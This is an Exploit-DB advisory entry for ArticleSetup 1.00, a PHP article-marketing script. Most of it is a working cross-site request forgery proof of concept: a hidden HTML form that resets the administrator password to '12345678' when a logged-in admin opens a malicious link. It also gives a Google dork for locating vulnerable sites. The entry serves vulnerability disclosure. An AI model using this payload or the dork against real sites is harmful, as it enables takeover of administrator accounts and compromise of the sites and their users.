ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)

Author: Ali Ghanbari
type: webapps
platform: php
port: 80.0
date_added: 2016-06-06 
date_updated: 2016-06-06 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comArticleSetup-Latest.zip

<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork   : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00

#Desc:

When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.

#Exploit:
-->

<html>
 <body>
  <form method="post"  action="
http://localhost/{PACH}/admin/adminsettings.php">
      <input type="hidden" name="update" value="1">
      <input type="hidden" name="pass1" type="hidden" value="12345678" >
      <input type="hidden" name="pass2" type="hidden" value="12345678" >
      <input type="submit" value="create">
  </form>
 </body>
</html>

<!--
####################################

[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007
-->